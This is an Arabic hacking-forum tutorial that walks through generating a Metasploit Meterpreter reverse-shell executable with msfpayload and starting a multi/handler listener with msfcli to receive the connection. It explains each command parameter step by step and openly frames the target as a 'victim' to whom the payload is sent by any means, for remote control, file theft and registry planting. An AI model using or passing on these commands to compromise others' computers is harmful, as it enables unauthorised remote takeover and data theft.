بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاتة
مدري طولت عليم بالدرس السادس لكن ظروف وامتحانات ... الله بعين .... الحمد لله وشكر لله
درسنا اليوم يكون عن صناعة بايلود اسمه Meterpreter وانا اعتبره من اقوى وافضل البايلود من بين البايلودات الاخرى والاغلب يعتبره قوية لانه قوية :D
ما قوي الا الله
يستعمل هذا البايلود بعد صناعته بأمتداد exe او pl في التحكم بجهاز الضحية ببعض الاوامر الذي يكون الامر يحل محل امر قوي كأمر زرع ريجستري ..واو ... وامر رفع ملف لجهاز الضحية وتشغيله وسحب ملف و و و
ان شاء الله بهل الاكمن يوم ادرجها لكم ...
الدرس فيديو لكن شرحته كتابي وبأمكانك ايضا تحميله يعني فيديو + كتابي لأصحاب النت الضعيفة
نبدأ الدرس
ملاحظة: هنا سنستخدم CMd shell في الميتاسبلويت وليس msfweb يعني ليس الرابط الذي تشعه بالمتصفح 127.0.0.1:55555
اول شيء نفتحه عن طريق ابدأ >> البرامج >>> Metasploit 3 >>> الكومند شيل CMD shell
نبدأ الدرس بأول امر وهو
كود PHP:
ruby msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=9999 X >"C:\"vbspiders.exe
الكود اول مرة تشوفونه للذين يتعلمون الميتا جديدا
هناك شروحات عن صناعة هذا ويشبه الشرح لكن هناك تطبيق دون فهم اي شيء منها يعني فيك تقول الفيديوهات عن هذه البايلود منقول لكن يختلف مقدم الفيديو .. انا وضعته لكي لا حد يتسائل
الآن الشرح الفيديو لي انا
مش هذا موضوعنا نبدأ بالشرح
ruby : كلمة تبدأ بها في اي شيء تستخدمه عن طريق CMD shell يكون بدايته ruby هذا ما نختلف عليه سواء كنت تستخدم msfcli سوف تكتب اول كلمة وهي ruby
msfpayload : تستخدم في في اسخدام بايلود نحن في هذه الحالة نستخدم صناعة بايلود وليس استخدام ثغرة .ز لو كان ثغرة كا وضعنا msfcli وجزء msf هو اساسي تضعه في البداية وبعدها النوع
windows/meterpreter/reverse_tcp : وهي اسم بايلود الميتر بريتر يعني ... نيجي لآخر مقطع reverse_tcp تستخدم في الاتصال العكسي مفيد في تخطي الجدار الناري وبأمكانكم وضع bind_tcp اذا كنت متأكد من البورت مفتوح .. لكن يفضل وضع اتصال عكسي ..... مش واحد ييجي ويقول بدي اضع الاثنين .. لكي اذا لم يزبط اتصال عكسي يجرب تلقائئي اتصال مباشر ويكون امره bind_tcp+reverse_tcp خخخخ <<< خخخ هذا غلط يا اخوان اما عكسي او مباشر ... واسم البايلود موجود بلميتا عن طريق وضع امر show payloads بتحصل هذه البايلود
LHOST : الكل يعرفها اذا تابع دروسي من اولها وهي لأختيار اي بي جهازك الذي تريد وصول التبليغ عليه يعني بأختصار تضع اي بي جهازك المحلي
LPORT : البورت الذي تريد استخدامه في الثغرة ويلزم يكون مفتوح بالراوتر
X : لصناعة البايلود بأمتداد exe اي تنفيذي وان شئت بأمكانك وضع P بدل X فيصنع البايلود بأمتداد بيرل لكن يلزم تعدل على الامتددا بوضع meter.pl
> : تستخدم لتشير الى وضعه بالمسار كذا يعني يتبعها المسار
"C:\"vbspiders.exe : هذا هو المسار لكن يحصر المسار بين علامتي تنصيص " وبعدها تكتب الاسم وبأمكانك وضع اي اسم تريد ولا يشترط هذا الاسم فقط
الآن نضغط انتر وننتظر الصناعة ورح يتم صناعتة بالمسار C وبحجم 9.50 كيلو بايت
الآن نريد نتصنت عليها بثغة تصنت بالميتا ويكون الامر هكذا
كود PHP:
ruby msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=9999 E
نشرح الامر
اول شيء
ruby : شرحناه فوق
msfcli : لأستخدام ثغرة << في هذه المر ثغرة وليس بايلود فنستخدم بالثغرات msfcli
بعدها يتبعها اسم الثغرة التصنت وهي multi/handler هي بالحقيقة لا تعتبر بأس ثغرة وانما بأسم اداة كالنت كات لكن هذه مخصصة فقط للتصنت على ثغرات الميت فقط
PAYLOAD= : وضع اسم البايلود التي نريد استخدامه يجب وضع اسم البايلود الذي نريد استخدامه حسب الذي تم صناعته من قبلك
يعني الامر كما هو موضح
PAYLOAD=windows/meterpreter/reverse_tcp
الخلاصة انك تضع اسم البايلود الذي تريد التصنت عليه
LHOST=192.168.1.1 : الاي بي الذي وضعناه في اعدادات صناعة البايلود وانت استبدله بأي بي ججهازك المحلي
LPORT=9999 : البورت الذي وضعناه في اعدادات الثغرة واستبدله بالبورت الذي تريد على حسب ما تم وضعه في ثغرتك
ولا تسوا حرف E لانه لن يتم عمل الثغرة الا بعد وضع هذا الحرف
الآن نضغط انتر وننتظر
الآن هيك تم الصناعة والتصنت يبقى ارسالة للضحية بأي طريقة تريدها ...
جربه على نفسك لكي تعتاد عليه
موفقين شباب
الى الامام بعون الله
هذا رابط الفيديو واشوفه اشمل وافضل من الكتابة لأنكم اول مرة للي يمرون عليه
Download
اي استفسار او شيء اناا جاهز
#####
تحياتي
لا للاحتكار
المجهوول
Fhg]vs hgsh]sD wkhum fhdg,] Meterpreter